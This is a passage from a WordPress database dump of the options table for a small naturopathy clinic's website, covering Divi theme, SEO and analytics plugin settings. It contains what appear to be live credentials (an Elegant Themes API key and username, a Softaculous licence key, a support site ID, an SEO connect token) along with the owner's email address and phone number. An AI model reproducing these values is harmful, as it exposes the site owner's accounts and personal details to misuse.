}\r\n}\";s:21:\"divi_enable_dropdowns\";s:2:\"on\";s:14:\"divi_home_link\";s:2:\"on\";s:15:\"divi_sort_pages\";s:10:\"post_title\";s:15:\"divi_order_page\";s:3:\"asc\";s:22:\"divi_tiers_shown_pages\";i:3;s:32:\"divi_enable_dropdowns_categories\";s:2:\"on\";s:21:\"divi_categories_empty\";s:2:\"on\";s:27:\"divi_tiers_shown_categories\";i:3;s:13:\"divi_sort_cat\";s:4:\"name\";s:14:\"divi_order_cat\";s:3:\"asc\";s:20:\"divi_disable_toptier\";s:5:\"false\";s:27:\"et_pb_post_type_integration\";a:4:{s:4:\"post\";s:2:\"on\";s:4:\"page\";s:2:\"on\";s:7:\"project\";s:2:\"on\";s:12:\"popupbuilder\";s:3:\"off\";}s:21:\"et_pb_static_css_file\";s:3:\"off\";s:19:\"et_pb_css_in_footer\";s:3:\"off\";s:25:\"et_pb_product_tour_global\";s:2:\"on\";s:24:\"et_enable_classic_editor\";s:3:\"off\";s:14:\"divi_postinfo2\";a:4:{i:0;s:6:\"author\";i:1;s:4:\"date\";i:2;s:10:\"categories\";i:3;s:8:\"comments\";}s:22:\"divi_show_postcomments\";s:2:\"on\";s:15:\"divi_thumbnails\";s:2:\"on\";s:20:\"divi_page_thumbnails\";s:5:\"false\";s:23:\"divi_show_pagescomments\";s:5:\"false\";s:14:\"divi_postinfo1\";a:3:{i:0;s:6:\"author\";i:1;s:4:\"date\";i:2;s:10:\"categories\";}s:21:\"divi_thumbnails_index\";s:2:\"on\";s:19:\"divi_seo_home_title\";s:5:\"false\";s:25:\"divi_seo_home_description\";s:5:\"false\";s:22:\"divi_seo_home_keywords\";s:5:\"false\";s:23:\"divi_seo_home_canonical\";s:5:\"false\";s:23:\"divi_seo_home_titletext\";s:0:\"\";s:29:\"divi_seo_home_descriptiontext\";s:0:\"\";s:26:\"divi_seo_home_keywordstext\";s:0:\"\";s:22:\"divi_seo_home_separate\";s:3:\" | \";s:21:\"divi_seo_single_title\";s:5:\"false\";s:27:\"divi_seo_single_description\";s:5:\"false\";s:24:\"divi_seo_single_keywords\";s:5:\"false\";s:25:\"divi_seo_single_canonical\";s:5:\"false\";s:27:\"divi_seo_single_field_title\";s:9:\"seo_title\";s:33:\"divi_seo_single_field_description\";s:15:\"seo_description\";s:30:\"divi_seo_single_field_keywords\";s:12:\"seo_keywords\";s:24:\"divi_seo_single_separate\";s:3:\" | \";s:24:\"divi_seo_index_canonical\";s:5:\"false\";s:26:\"divi_seo_index_description\";s:5:\"false\";s:23:\"divi_seo_index_separate\";s:3:\" | \";s:28:\"divi_integrate_header_enable\";s:2:\"on\";s:26:\"divi_integrate_body_enable\";s:2:\"on\";s:31:\"divi_integrate_singletop_enable\";s:2:\"on\";s:34:\"divi_integrate_singlebottom_enable\";s:2:\"on\";s:21:\"divi_integration_head\";s:0:\"\";s:21:\"divi_integration_body\";s:0:\"\";s:27:\"divi_integration_single_top\";s:0:\"\";s:30:\"divi_integration_single_bottom\";s:0:\"\";s:15:\"divi_468_enable\";s:5:\"false\";s:14:\"divi_468_image\";s:0:\"\";s:12:\"divi_468_url\";s:0:\"\";s:16:\"divi_468_adsense\";s:0:\"\";s:14:\"primary_nav_bg\";s:7:\"#ccd4c8\";s:13:\"nav_fullwidth\";b:0;s:17:\"hide_primary_logo\";b:0;s:11:\"menu_height\";i:100;s:11:\"logo_height\";i:100;s:16:\"et_global_colors\";a:2:{s:41:\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\";a:2:{s:5:\"color\";s:7:\"#ffffff\";s:6:\"active\";s:3:\"yes\";}s:41:\"gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761\";a:2:{s:5:\"color\";s:22:\"rgba(204,212,200,0.55)\";s:6:\"active\";s:3:\"yes\";}}s:9:\"footer_bg\";s:7:\"#ccd4c8\";s:29:\"disable_custom_footer_credits\";b:1;s:12:\"heading_font\";s:16:\"Playfair Display\";s:9:\"body_font\";s:10:\"Montserrat\";s:12:\"divi_favicon\";s:0:\"\";s:22:\"footer_menu_text_color\";s:7:\"#000000\";s:29:\"footer_menu_active_link_color\";s:7:\"#000000\";s:29:\"presets_storage_migrated_flag\";b:1;s:39:\"builder_global_presets_history_migrated\";b:1;s:31:\"all_third_party_shortcode_slugs\";a:0:{}s:14:\"et_global_data\";a:1:{s:13:\"global_colors\";a:2:{s:41:\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\";a:6:{s:5:\"color\";s:7:\"#ffffff\";s:6:\"folder\";s:0:\"\";s:5:\"label\";s:0:\"\";s:11:\"lastUpdated\";s:24:\"2026-05-25T10:56:52.000Z\";s:6:\"status\";s:6:\"active\";s:11:\"usedInPosts\";a:0:{}}s:41:\"gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761\";a:6:{s:5:\"color\";s:22:\"rgba(204,212,200,0.55)\";s:6:\"folder\";s:0:\"\";s:5:\"label\";s:0:\"\";s:11:\"lastUpdated\";s:24:\"2026-05-25T10:56:52.000Z\";s:6:\"status\";s:6:\"active\";s:11:\"usedInPosts\";a:0:{}}}}s:20:\"et_fb_pref_app_theme\";s:11:\"d5-enhanced\";s:25:\"et_fb_pref_app_color_mode\";s:5:\"light\";s:27:\"et_fb_pref_app_color_scheme\";s:4:\"blue\";s:24:\"et_fb_pref_app_admin_bar\";a:1:{s:7:\"visible\";b:0;}s:33:\"et_fb_pref_app.interaction_layers\";a:3:{s:13:\"actionOnHover\";b:1;s:19:\"parentActionOnHover\";b:1;s:4:\"xRay\";b:0;}s:34:\"et_fb_pref_app_enable_prerendering\";b:1;s:39:\"et_fb_pref_modal_always_collapse_groups\";b:1;s:25:\"et_fb_pref_page_bar_icons\";a:6:{s:4:\"undo\";b:0;s:4:\"redo\";b:0;s:7:\"history\";b:0;s:11:\"portability\";b:0;s:11:\"clearLayout\";b:0;s:12:\"addToLibrary\";b:0;}s:39:\"et_fb_pref_show_theme_builder_templates\";b:1;}','yes'),(243,'widget_aboutmewidget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(244,'widget_adsensewidget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(245,'widget_advwidget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(246,'shop_catalog_image_size','a:3:{s:5:\"width\";s:3:\"400\";s:6:\"height\";s:3:\"400\";s:4:\"crop\";i:1;}','yes'),(247,'shop_single_image_size','a:3:{s:5:\"width\";s:3:\"510\";s:6:\"height\";s:4:\"9999\";s:4:\"crop\";i:0;}','yes'),(248,'shop_thumbnail_image_size','a:3:{s:5:\"width\";s:3:\"157\";s:6:\"height\";s:3:\"157\";s:4:\"crop\";i:1;}','yes'),(249,'et_safe_mode_plugins_allowlist','a:9:{i:0;s:15:\"etdev/etdev.php\";i:1;s:15:\"bloom/bloom.php\";i:2;s:19:\"monarch/monarch.php\";i:3;s:29:\"divi-builder/divi-builder.php\";i:4;s:23:\"divi-dash/divi-dash.php\";i:5;s:27:\"ari-adminer/ari-adminer.php\";i:6;s:31:\"query-monitor/query-monitor.php\";i:7;s:27:\"woocommerce/woocommerce.php\";i:8;s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";}','yes'),(250,'et_support_center_installed','true','yes'),(251,'et_images_temp_folder','/home/desid573/verde.desidrivers.com.au/wp-content/uploads/et_temp','yes'),(252,'et_schedule_clean_images_last_time','1786938891','yes'),(253,'et_bfb_settings','a:2:{s:10:\"enable_bfb\";s:2:\"on\";s:10:\"toggle_bfb\";s:2:\"on\";}','yes'),(254,'_transient_et_builder_show_bfb_welcome_modal','1','yes'),(192,'pagenavi_options','a:15:{s:10:\"pages_text\";s:36:\"Page %CURRENT_PAGE% of %TOTAL_PAGES%\";s:12:\"current_text\";s:13:\"%PAGE_NUMBER%\";s:9:\"page_text\";s:13:\"%PAGE_NUMBER%\";s:10:\"first_text\";s:13:\"« First\";s:9:\"last_text\";s:12:\"Last »\";s:9:\"prev_text\";s:7:\"«\";s:9:\"next_text\";s:7:\"»\";s:12:\"dotleft_text\";s:3:\"...\";s:13:\"dotright_text\";s:3:\"...\";s:9:\"num_pages\";i:5;s:23:\"num_larger_page_numbers\";i:3;s:28:\"larger_page_numbers_multiple\";i:10;s:11:\"always_show\";b:0;s:16:\"use_pagenavi_css\";b:1;s:5:\"style\";i:1;}','yes'),(193,'recently_activated','a:0:{}','off'),(194,'widget_alxposts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(195,'widget_alxtabs','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(119409,'softaculous_pro_license','a:13:{s:7:\"license\";s:30:\"SOFTWP-82163-66360-75213-61280\";s:7:\"expires\";s:8:\"20250628\";s:4:\"type\";s:1:\"1\";s:8:\"type_txt\";s:7:\"Premium\";s:9:\"num_sites\";N;s:4:\"plan\";s:8:\"personal\";s:6:\"active\";i:1;s:10:\"licexpired\";N;s:4:\"thid\";N;s:6:\"status\";i:1;s:9:\"last_edit\";s:10:\"1750791288\";s:10:\"status_txt\";s:33:\"<font color=\"green\">Active</font>\";s:8:\"has_plid\";i:1;}','yes'),(198,'WPLANG','','yes'),(199,'new_admin_email','mel-cann@live.com.au','yes'),(202,'pagelayer_getting_started','1619786166','yes'),(203,'recovery_mode_email_last_sent','1619786168','yes'),(214,'theme_mods_blossom-health-coach','a:1:{s:18:\"custom_css_post_id\";i:-1;}','no'),(234,'theme_mods_Divi','a:7:{i:0;b:0;s:18:\"nav_menu_locations\";a:2:{s:11:\"footer-menu\";i:13;s:12:\"primary-menu\";i:2;}s:18:\"custom_css_post_id\";i:84;s:16:\"et_pb_css_synced\";s:3:\"yes\";s:39:\"et_updated_layouts_built_for_post_types\";s:3:\"yes\";s:13:\"et_pb_widgets\";a:2:{s:5:\"areas\";a:1:{s:19:\"et_pb_widget_area_1\";s:8:\"header 1\";}s:6:\"number\";i:1;}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1779676414;s:4:\"data\";a:2:{s:19:\"wp_inactive_widgets\";a:3:{i:0;s:6:\"meta-2\";i:1;s:8:\"search-2\";i:2;s:17:\"recent-comments-2\";}s:9:\"sidebar-1\";a:3:{i:0;s:14:\"recent-posts-2\";i:1;s:10:\"archives-2\";i:2;s:12:\"categories-2\";}}}}','on'),(314,'_transient_health-check-site-status-result','{\"good\":19,\"recommended\":4,\"critical\":3}','yes'),(453,'et_pb_contact_form_8bac5fd57fd2ae04095ad4d129c49a80','off','yes'),(454,'et_pb_contact_form_1a15c871e89382cbf1058027db9b8326','off','yes'),(322,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:20:\"mel-cann@live.com.au\";s:7:\"version\";s:3:\"7.1\";s:9:\"timestamp\";i:1787205329;}','off'),(256,'et_support_center_setup_done','processed','yes'),(259,'et_account_status','active','off'),(274,'et_automatic_updates_options','a:2:{s:8:\"username\";s:9:\"lewiscann\";s:7:\"api_key\";s:40:\"823f54e77e93bb7a68ebc39d806525b8254b50f7\";}','no'),(275,'et_support_site_id','FVxqQT3jy(7wHm)SDv2A','yes'),(485,'rlrsssl_options','a:14:{s:12:\"site_has_ssl\";b:1;s:25:\"ssl_success_message_shown\";b:0;s:22:\"htaccess_warning_shown\";b:0;s:19:\"review_notice_shown\";b:1;s:17:\"plugin_db_version\";s:6:\"4.0.15\";s:11:\"ssl_enabled\";b:1;s:4:\"hsts\";b:0;s:19:\"javascript_redirect\";b:0;s:11:\"wp_redirect\";b:1;s:26:\"autoreplace_insecure_links\";b:1;s:20:\"do_not_edit_htaccess\";b:0;s:31:\"switch_mixed_content_fixer_hook\";b:0;s:19:\"dismiss_all_notices\";b:0;s:17:\"htaccess_redirect\";b:1;}','yes'),(282,'et_google_api_settings','a:3:{s:7:\"api_key\";s:0:\"\";s:26:\"enqueue_google_maps_script\";s:2:\"on\";s:16:\"use_google_fonts\";s:2:\"on\";}','yes'),(468,'et_pb_contact_form_a4cdbb184af2483497ec0d5a0df19b8e','off','yes'),(2265,'widget_block','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(16602,'action_scheduler_lock_async-request-runner','1779254142','yes'),(16603,'aioseo_options_internal','{\"internal\":{\"validLicenseKey\":null,\"lastActiveVersion\":\"4.2.0\",\"migratedVersion\":\"0.0\",\"siteAnalysis\":{\"connectToken\":\"0b3062ed-c36b-5524-9e95-d446610f8c1a\",\"score\":75,\"results\":\"{\\\"basic\\\":{\\\"title\\\":{\\\"status\\\":\\\"passed\\\",\\\"value\\\":\\\"Verde Naturopathy\\\",\\\"length\\\":17},\\\"description\\\":{\\\"status\\\":\\\"passed\\\",\\\"value\\\":\\\"Kalamunda Naturopath providing holistic healing and herbal medicine\\\",\\\"length\\\":67},\\\"keywords\\\":{\\\"health\\\":16,\\\"treatment\\\":6,\\\"medicine\\\":5,\\\"make\\\":4,\\\"naturopathy\\\":3,\\\"nutritional\\\":3,\\\"min)\\\":3,\\\"consult\\\":3,\\\"poor\\\":3,\\\"herbal\\\":3},\\\"keywordsInTitleDescription\\\":{\\\"status\\\":\\\"passed\\\",\\\"value\\\":{\\\"title\\\":{\\\"naturopathy\\\":1},\\\"description\\\":{\\\"herbal\\\":1,\\\"medicine\\\":1}}},\\\"h1Tags\\\":{\\\"status\\\":\\\"error\\\",\\\"value\\\":[],\\\"error\\\":\\\"h1-missing\\\"},\\\"h2Tags\\\":{\\\"status\\\":\\\"passed\\\",\\\"value\\\":[\\\"Make the shift to a more holistic health approach\\\",\\\"Consultations\\\",\\\"Treatments\\\",\\\"Clinic info\\\"]},\\\"noImgAltAtts\\\":{\\\"status\\\":\\\"error\\\",\\\"value\\\":[\\\"\\\",\\\"\\\",\\\"\\\",\\\"\\\",\\\"\\\",\\\"\\\",\\\"\\\",\\\"\\\",\\\"\\\",\\\"\\\"],\\\"error\\\":\\\"image-missing-alt\\\"},\\\"linksRatio\\\":{\\\"status\\\":\\\"error\\\",\\\"value\\\":{\\\"internal\\\":6,\\\"external\\\":3},\\\"error\\\":\\\"internal-links-too-few\\\"}},\\\"advanced\\\":{\\\"searchPreview\\\":\\\"https:\\\\\\/\\\\\\/verdenaturopathy.com.au\\\\\\/Verde NaturopathyKalamunda Naturopath providing holistic healing and herbal medicine\\\",\\\"mobileSearchPreview\\\":\\\"https:\\\\\\/\\\\\\/verdenaturopathy.com.au\\\\\\/Verde NaturopathyKalamunda Naturopath providing holistic healing and herbal medicine\\\",\\\"mobileSnapshot\\\":\\\"https:\\\\\\/\\\\\\/image.thum.io\\\\\\/get\\\\\\/auth\\\\\\/11036-aioseo\\\\\\/iphone6\\\\\\/https:\\\\\\/\\\\\\/verdenaturopathy.com.au\\\",\\\"canonicalTag\\\":{\\\"status\\\":\\\"passed\\\",\\\"value\\\":\\\"https:\\\\\\/\\\\\\/verdenaturopathy.com.au\\\\\\/\\\"},\\\"noindex\\\":{\\\"status\\\":\\\"passed\\\"},\\\"wwwCanonicalization\\\":{\\\"status\\\":\\\"passed\\\"},\\\"robotsRules\\\":{\\\"status\\\":\\\"passed\\\",\\\"value\\\":\\\"User-agent: *\\\\r\\\\nAllow: \\\\\\/wp-admin\\\\\\/admin-ajax.php\\\\r\\\\nDisallow: \\\\\\/wp-admin\\\\\\/\\\\r\\\\n\\\\r\\\\nSitemap: https:\\\\\\/\\\\\\/verdenaturopathy.com.au\\\\\\/sitemap.xml\\\\r\\\\nSitemap: https:\\\\\\/\\\\\\/verdenaturopathy.com.au\\\\\\/sitemap.rss\\\\r\\\\n\\\\r\\\\n\\\"},\\\"openGraph\\\":{\\\"status\\\":\\\"passed\\\"},\\\"schema\\\":{\\\"status\\\":\\\"passed\\\"}},\\\"performance\\\":{\\\"hasImgExpires\\\":{\\\"status\\\":\\\"error\\\",\\\"error\\\":\\\"image-expires-missing\\\"},\\\"unminifiedJs\\\":{\\\"status\\\":\\\"error\\\",\\\"value\\\":[\\\"https:\\\\\\/\\\\\\/www.googletagmanager.com\\\\\\/gtag\\\\\\/js\\\",\\\"https:\\\\\\/\\\\\\/verdenaturopathy.com.au\\\\\\/wp-content\\\\\\/themes\\\\\\/divi\\\\\\/includes\\\\\\/builder\\\\\\/frontend-builder\\\\\\/build\\\\\\/frontend-builder-global-functions.js\\\",\\\"https:\\\\\\/\\\\\\/verdenaturopathy.com.au\\\\\\/wp-content\\\\\\/themes\\\\\\/divi\\\\\\/js\\\\\\/custom.js\\\",\\\"https:\\\\\\/\\\\\\/verdenaturopathy.com.au\\\\\\/wp-content\\\\\\/themes\\\\\\/divi\\\\\\/includes\\\\\\/builder\\\\\\/scripts\\\\\\/ext\\\\\\/jquery.fitvids.js\\\",\\\"https:\\\\\\/\\\\\\/verdenaturopathy.com.au\\\\\\/wp-content\\\\\\/themes\\\\\\/divi\\\\\\/includes\\\\\\/builder\\\\\\/scripts\\\\\\/ext\\\\\\/jquery.magnific-popup.js\\\",\\\"https:\\\\\\/\\\\\\/verdenaturopathy.com.au\\\\\\/wp-content\\\\\\/themes\\\\\\/divi\\\\\\/includes\\\\\\/builder\\\\\\/frontend-builder\\\\\\/build\\\\\\/frontend-builder-scripts.js\\\",\\\"https:\\\\\\/\\\\\\/verdenaturopathy.com.au\\\\\\/wp-content\\\\\\/themes\\\\\\/divi\\\\\\/core\\\\\\/admin\\\\\\/js\\\\\\/common.js\\\"],\\\"error\\\":\\\"js-unminified\\\"},\\\"unminifiedCss\\\":{\\\"status\\\":\\\"error\\\",\\\"value\\\":[\\\"https:\\\\\\/\\\\\\/verdenaturopathy.com.au\\\\\\/wp-content\\\\\\/themes\\\\\\/divi\\\\\\/style.dev.css\\\",\\\"https:\\\\\\/\\\\\\/fonts.googleapis.com\\\\\\/css\\\",\\\"https:\\\\\\/\\\\\\/verdenaturopathy.com.au\\\\\\/wp-content\\\\\\/themes\\\\\\/divi\\\\\\/epanel\\\\\\/shortcodes\\\\\\/css\\\\\\/shortcodes_responsive.css\\\",\\\"https:\\\\\\/\\\\\\/verdenaturopathy.com.au\\\\\\/wp-content\\\\\\/themes\\\\\\/divi\\\\\\/includes\\\\\\/builder\\\\\\/styles\\\\\\/magnific_popup.css\\\"],\\\"error\\\":\\\"css-unminified\\\"},\\\"pageObjects\\\":{\\\"status\\\":\\\"error\\\",\\\"value\\\":{\\\"images\\\":9,\\\"js\\\":12,\\\"css\\\":6},\\\"total\\\":27,\\\"error\\\":\\\"page-objects-too-many\\\"},\\\"pageSize\\\":{\\\"status\\\":\\\"passed\\\",\\\"value\\\":14788},\\\"responseTime\\\":{\\\"status\\\":\\\"passed\\\",\\\"value\\\":0}},\\\"security\\\":{\\\"directoryListing\\\":{\\\"status\\\":\\\"passed\\\"},\\\"googleSafeBrowsing\\\":{\\\"status\\\":\\\"passed\\\"},\\\"secureConnection\\\":{\\\"status\\\":\\\"passed\\\"}}}\",\"competitors\":[]},\"headlineAnalysis\":{\"headlines\":[]},\"wizard\":\"{\\\"currentStage\\\":\\\"license-key\\\",\\\"stages\\\":[\\\"category\\\",\\\"additional-information\\\",\\\"features\\\",\\\"search-appearance\\\",\\\"smart-recommendations\\\",\\\"license-key\\\"],\\\"importers\\\":[],\\\"category\\\":{\\\"category\\\":\\\"small-offline-business\\\",\\\"categoryOther\\\":null,\\\"siteTitle\\\":\\\"Verde Naturopathy\\\",\\\"metaDescription\\\":\\\"Kalamunda Naturopath providing holistic healing and herbal medicine\\\"},\\\"additionalInformation\\\":{\\\"siteRepresents\\\":\\\"organization\\\",\\\"person\\\":null,\\\"organizationName\\\":\\\"Verde Naturopathy\\\",\\\"organizationLogo\\\":\\\"https:\\\\\\/\\\\\\/verdenaturopathy.com.au\\\\\\/wp-content\\\\\\/uploads\\\\\\/2021\\\\\\/04\\\\\\/cropped-Standard-01-2.jpg\\\",\\\"personName\\\":null,\\\"personLogo\\\":null,\\\"phone\\\":\\\"+61421194346\\\",\\\"contactType\\\":\\\"manual\\\",\\\"contactTypeManual\\\":\\\"Mel\\\",\\\"socialShareImage\\\":\\\"https:\\\\\\/\\\\\\/verdenaturopathy.com.au\\\\\\/wp-content\\\\\\/uploads\\\\\\/2021\\\\\\/04\\\\\\/cropped-Standard-01-2.jpg\\\",\\\"social\\\":{\\\"profiles\\\":{\\\"sameUsername\\\":{\\\"enable\\\":false,\\\"username\\\":null,\\\"included\\\":[\\\"facebookPageUrl\\\",\\\"twitterUrl\\\",\\\"pinterestUrl\\\",\\\"instagramUrl\\\",\\\"youtubeUrl\\\",\\\"linkedinUrl\\\"]},\\\"urls\\\":{\\\"facebookPageUrl\\\":\\\"https:\\\\\\/\\\\\\/www.facebook.com\\\\\\/verdenaturopathy\\\\\\/\\\",\\\"twitterUrl\\\":null,\\\"instagramUrl\\\":\\\"https:\\\\\\/\\\\\\/www.instagram.com\\\\\\/verde_naturopathy\\\\\\/\\\",\\\"pinterestUrl\\\":null,\\\"youtubeUrl\\\":null,\\\"linkedinUrl\\\":null,\\\"tumblrUrl\\\":null,\\\"yelpPageUrl\\\":null,\\\"soundCloudUrl\\\":null,\\\"wikipediaUrl\\\":null,\\\"myspaceUrl\\\":null,\\\"googlePlacesUrl\\\":null}}}},\\\"features\\\":[\\\"optimized-search-appearance\\\",\\\"analytics\\\",\\\"sitemaps\\\"],\\\"searchAppearance\\\":{\\\"underConstruction\\\":false,\\\"postTypes\\\":{\\\"postTypes\\\":{\\\"all\\\":true,\\\"included\\\":[\\\"post\\\",\\\"page\\\",\\\"attachment\\\",\\\"product\\\"]}},\\\"multipleAuthors\\\":true,\\\"redirectAttachmentPages\\\":true},\\\"smartRecommendations\\\":{\\\"accountInfo\\\":\\\"mel-cann@live.com.au\\\",\\\"usageTracking\\\":false},\\\"licenseKey\\\":null}\",\"category\":\"small-offline-business\",\"categoryOther\":null,\"deprecatedOptions\":[]},\"integrations\":{\"semrush\":{\"accessToken\":null,\"tokenType\":null,\"expires\":null,\"refreshToken\":null}},\"database\":{\"installedTables\":\"{\\\"wpln_aioseo_posts\\\":[\\\"id\\\",\\\"post_id\\\",\\\"title\\\",\\\"description\\\",\\\"keywords\\\",\\\"keyphrases\\\",\\\"page_analysis\\\",\\\"canonical_url\\\",\\\"og_title\\\",\\\"og_description\\\",\\\"og_object_type\\\",\\\"og_image_type\\\",\\\"og_image_url\\\",\\\"og_image_width\\\",\\\"og_image_height\\\",\\\"og_image_custom_url\\\",\\\"og_image_custom_fields\\\",\\\"og_video\\\",\\\"og_custom_url\\\",\\\"og_article_section\\\",\\\"og_article_tags\\\",\\\"twitter_use_og\\\",\\\"twitter_card\\\",\\\"twitter_image_type\\\",\\\"twitter_image_url\\\",\\\"twitter_image_custom_url\\\",\\\"twitter_image_custom_fields\\\",\\\"twitter_title\\\",\\\"twitter_description\\\",\\\"seo_score\\\",\\\"schema_type\\\",\\\"schema_type_options\\\",\\\"pillar_content\\\",\\\"robots_default\\\",\\\"robots_noindex\\\",\\\"robots_noarchive\\\",\\\"robots_nosnippet\\\",\\\"robots_nofollow\\\",\\\"robots_noimageindex\\\",\\\"robots_noodp\\\",\\\"robots_notranslate\\\",\\\"robots_max_snippet\\\",\\\"robots_max_videopreview\\\",\\\"robots_max_imagepreview\\\",\\\"tabs\\\",\\\"images\\\",\\\"image_scan_date\\\",\\\"priority\\\",\\\"frequency\\\",\\\"videos\\\",\\\"video_thumbnail\\\",\\\"video_scan_date\\\",\\\"local_seo\\\",\\\"limit_modified_date\\\",\\\"created\\\",\\\"updated\\\"],\\\"wpln_actionscheduler_actions\\\":[],\\\"wpln_actionscheduler_logs\\\":[],\\\"wpln_actionscheduler_groups\\\":[],\\\"wpln_actionscheduler_claims\\\":[],\\\"wpln_aioseo_notifications\\\":[]}\"}}','yes'),(16639,'monsterinsights_notifications_run','a:25:{s:37:\"monsterinsights_notification_visitors\";i:1760941026;s:37:\"monsterinsights_notification_audience\";i:1760962658;s:55:\"monsterinsights_notification_mobile_device_high_traffic\";i:1760962658;s:42:\"monsterinsights_notification_mobile_device\";i:1760962658;s:43:\"monsterinsights_notification_upgrade_to_pro\";i:1761099197;s:56:\"monsterinsights_notification_upgrade_to_pro_high_traffic\";i:1761099257;s:40:\"monsterinsights_notification_bounce_rate\";i:1761099257;s:42:\"monsterinsights_notification_dual_tracking\";i:1761099257;s:47:\"monsterinsights_notification_returning_visitors\";i:1761099257;s:45:\"monsterinsights_notification_traffic_dropping\";i:1761099315;s:64:\"monsterinsights_notification_upgrade_for_popular_posts_templates\";i:1761099315;s:57:\"monsterinsights_notification_upgrade_for_events_reporting\";i:1761099327;s:62:\"monsterinsights_notification_upgrade_for_search_console_report\";i:1761113640;s:56:\"monsterinsights_notification_upgrade_for_form_conversion\";i:1761114293;s:56:\"monsterinsights_notification_upgrade_for_email_summaries\";i:1761114400;s:58:\"monsterinsights_notification_upgrade_for_custom_dimensions\";i:1761114409;s:56:\"monsterinsights_notification_upgrade_for_google_optimize\";i:1761114546;s:39:\"monsterinsights_notification_eu_traffic\";i:1761114556;s:56:\"monsterinsights_notification_to_add_more_file_extensions\";i:1761114556;s:53:\"monsterinsights_notification_to_setup_affiliate_links\";i:1761114566;s:46:\"monsterinsights_notification_headline_analyzer\";i:1761114593;s:49:\"monsterinsights_notification_install_optinmonster\";i:1761114618;s:43:\"monsterinsights_notification_install_aioseo\";i:1761114618;s:44:\"monsterinsights_notification_install_wpforms\";i:1761114618;s:43:\"monsterinsights_notification_multiple_gtags\";i:1761114626;}','off'),(16634,'monsterinsights_usage_tracking_config','a:6:{s:3:\"day\";i:0;s:4:\"hour\";i:23;s:6:\"minute\";i:27;s:6:\"second\";i:20;s:6:\"offset\";i:84440;s:8:\"initsend\";i:1652052440;}','yes'),(16641,'monsterinsights_notifications','a:5:{s:6:\"update\";i:1786951724;s:4:\"feed\";a:0:{}s:6:\"events\";a:49:{i:0;a:10:{s:2:\"id\";s:53:\"monsterinsights_notification_install_wpforms_20251022\";s:4:\"icon\";s:4:\"star\";s:5:\"title\";s:37:\"Create a Contact Form in Only Minutes\";s:7:\"content\";s:64:\"Install WPForms and create contact forms in a matter of minutes.\";s:4:\"type\";a:5:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:6:\"master\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";}s:4:\"btns\";a:0:{}s:5:\"start\";s:18:\"10/22/2025 6:30 am\";s:3:\"end\";s:10:\"11/19/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:2;}i:1;a:10:{s:2:\"id\";s:51:\"monsterinsights_notification_mobile_device_20250401\";s:4:\"icon\";s:7:\"default\";s:5:\"title\";s:30:\"Traffic From Mobile Devices 0%\";s:7:\"content\";s:526:\"Traffic from mobile devices is considerably lower on your site compared to desktop devices. This could be an indicator that your site is not optimised for mobile devices.<br><br>Take a look now at <a href=\"https://www.wpbeginner.com/beginners-guide/how-to-preview-the-mobile-layout-of-your-site/?utm_source=monsterinsights&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\" target=\"_blank\">how your site looks</a> on mobile and make sure all your content can be accessed correctly.\";s:4:\"type\";a:5:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:6:\"master\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";}s:4:\"btns\";a:2:{s:11:\"view_report\";a:2:{s:3:\"url\";s:144:\"https://verdenaturopathy.com.au/wp-admin/admin.php?page=monsterinsights_reports&monsterinsights-scroll=devices&monsterinsights-highlight=devices\";s:4:\"text\";s:11:\"View Report\";}s:10:\"learn_more\";a:3:{s:3:\"url\";s:211:\"https://www.wpbeginner.com/beginners-guide/how-to-preview-the-mobile-layout-of-your-site/?utm_source=monsterinsights&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\";s:4:\"text\";s:10:\"Learn More\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:19:\"04/01/2025 11:52 am\";s:3:\"end\";s:10:\"04/14/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:2;}i:2;a:10:{s:2:\"id\";s:62:\"monsterinsights_notification_to_setup_affiliate_links_20250401\";s:4:\"icon\";s:7:\"default\";s:5:\"title\";s:30:\"Set Up Affiliate Link Tracking\";s:7:\"content\";s:557:\"By tracking your affiliate links in Google Analytics, you can gather all the data you need to optimize your links for maximizing affiliate revenue. You can track affiliate link clicks on your website with little configuration needed.<br><br><a href=\"https://www.monsterinsights.com/how-to-set-up-affiliate-link-tracking-in-wordpress/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\" target=\"_blank\">In this article</a>, we’ll show you how to set up affiliate link tracking in WordPress.\";s:4:\"type\";a:5:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:6:\"master\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";}s:4:\"btns\";a:1:{s:9:\"read_more\";a:3:{s:3:\"url\";s:200:\"https://www.monsterinsights.com/how-to-set-up-affiliate-link-tracking-in-wordpress/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\";s:4:\"text\";s:9:\"Read More\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:19:\"04/01/2025 11:59 am\";s:3:\"end\";s:10:\"04/24/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:2;}i:3;a:10:{s:2:\"id\";s:51:\"monsterinsights_notification_mobile_device_20251020\";s:4:\"icon\";s:7:\"default\";s:5:\"title\";s:30:\"Traffic From Mobile Devices 0%\";s:7:\"content\";s:526:\"Traffic from mobile devices is considerably lower on your site compared to desktop devices. This could be an indicator that your site is not optimised for mobile devices.<br><br>Take a look now at <a 